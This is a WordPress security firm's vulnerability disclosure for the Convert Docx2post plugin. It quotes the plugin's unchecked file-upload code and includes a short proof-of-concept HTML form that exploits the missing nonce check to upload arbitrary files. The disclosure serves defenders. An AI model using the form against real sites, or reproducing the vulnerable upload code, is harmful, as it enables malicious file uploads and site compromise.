23 Feb

Our Proactive Monitoring Caught an Authenticated Arbitrary File Upload Vulnerability in Convert Docx2post

One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities. That sometimes leads to us catching a vulnerability of a more limited version of one of those serious vulnerability types, which isn’t as much concern for the average website, but could be utilized in a targeted attack. That happened with the authenticated arbitrary file upload vulnerability we found in the plugin Convert Docx2post. This vulnerability could allow someone that has access to a WordPress account with the “publish_posts” capability (which would normally be any user with the Author role and above) to upload a malicious file to the website, which could they use to take additional actions on with the website. It also could allow an attacker that could get a logged in user to visit a URL the attacker controls, to upload a malicious file to the website, which the hacker could then use to take additional actions on their own with the website.

Since the check used to spot this is also included in our Plugin Security Checker (which  is now accessible through a WordPress plugin of its own), it is another of reminder of how that can help to indicate which plugins are in greater need of security review (for which we do as part of our service as well as separately).

In the file /options.php, as of version 1.4, the first code that runs is:

if (isset($_POST['create']) && $_FILES['fileToUpload']["tmp_name"][0]) {
$target_dir = wp_upload_dir();
if (!file_exists($target_dir['basedir'] . '/docx2post')) {
    mkdir($target_dir['basedir'] . '/docx2post', 0775, true);
if ($_FILES['fileToUpload']) {
    $file_ary = reArrayFiles($_FILES['fileToUpload']);
    foreach ($file_ary as $file) {
$target_file = $target_dir['basedir'] ."/docx2post/". basename($file["name"]);
move_uploaded_file($file["tmp_name"], $target_file);

That code will save any type of file sent with a request to the directory /wp-content/uploads/docx2post/ as long as the POST input “create” is included with the request. Since there is no check for a valid nonce the code is susceptible to cross-site request forgery (CSRF).

The code in that file runs when the plugin’s admin page is accessed. That page is accessible for users with the “publish_posts” capability:

add_menu_page('convert_docx2post', 'Convert Docx', 'publish_posts', 'convert-docx2post/options.php', '', 'dashicons-media-document', 6);

We notified the developer of the issue a week ago. We haven’t heard back from them and no new version has been released to fix the issue. In line with our disclosure policy, which is based on the need to provide our customers with information on vulnerabilities on a timely basis, we are now disclosing this vulnerability.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/docx2post/, when logged in as an Author-level users.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin.php?page=convert-docx2post%2Foptions.php" method="POST" enctype="multipart/form-data">
<input type="file" name="fileToUpload[]" />
<input type="submit" name="create" value="Submit" />


  • February 16, 2018 – Developer notified.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.